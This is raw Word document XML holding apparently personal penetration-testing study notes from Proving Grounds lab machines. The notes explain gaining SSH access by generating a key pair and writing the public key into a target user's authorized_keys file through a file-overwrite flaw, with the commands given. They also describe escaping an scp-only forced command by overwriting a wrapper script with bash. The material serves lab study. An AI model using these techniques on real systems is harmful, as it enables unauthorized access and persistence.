          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice in order to get more stable connection</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId258">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice since we can overwrite any file so we used it to get foothold using SSH</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can upload files into the .ssh directory (ex. /home/alfredo/.ssh), then you can upload your own public SSH key as the file "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">". </w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This overwrites or creates the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, essentially telling the system: "Allow logins from anyone with the private key corresponding to this public key."</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can SSH using your private key, and then you can now SSH into that user's account</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps:</w:t>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Let's create a brand new SSH key pair with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-keygen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-keygen -f authorized_keys -t rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" specifies the name of the files. So they will be "authorized_keys.pub" and "authorized_keys"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" makes them in rsa format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="342"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make empty passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C68">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C69">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you should have a public and private key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1487"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys.pub (public)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1487"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys (private)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then upload the public key (ending in .pub) into the target user's .ssh directory as "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv authorized_keys.pub authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename it to remove the .pub</w:t>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t xml:space="preserve">Now add correct permissions to the private key in your kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 authorized_keys</w:t>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t xml:space="preserve">Now login via SSH and the private key</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="968"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i authorized_keys alfredo@192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="968"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They ran this command in the same directory where the keys are, but if the keys aren't in the working directory, then you just need to specify the file path to the private key (id_alfredo is the name of the private key file)</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6p6e3saqpbq9" w:id="109"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regular Users: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in ~/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Located in /root/.ssh/authorized_keys</w:t>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t xml:space="preserve">Permissions should be 600 for files in authorized_keys and the .ssh directory itself should be 700</w:t>
      </w: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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="448" name="image456.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image456.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId259"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="927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85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1401"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MoneyBox </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The key type (RSA in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AAAAB3NzaC1... </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ The actual base64-encoded public key data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">renu@debian</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → A comment, usually identifying who the key belongs to or where it was generated.</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t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MoneyBox </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG play, the comment was helpful since seeing "renu" in the comment hinted that "renu" (the currently compromised user) has the corresponding private key to this public key inside of authorized_keys, allowing us (renu) to SSH into this target user without password. </w:t>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ind w:left="-1170" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7461770" cy="1303418"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71" name="image69.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image69.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId260"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7461770" cy="1303418"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C90">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3519488" cy="1937394"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="456" name="image444.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image444.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId261"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3519488" cy="1937394"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one was from </w:t>
      </w:r>
      <w:hyperlink r:id="rId262">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sorcerer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found max's id_rsa keys and this authorized_keys file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen from the underlined section, This means when we connect as the user max to SSH </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can only execute commands that start with 'scp'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. As SCP runs over SSH we can use use id_rsa file from Max to connect and overwrite the wrapper file with something more useful such as 'bash' instead of 'scp'.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C93">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I edited the scp_wrapper.sh file to include the command 'bash' and changed the error message for troubleshooting purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
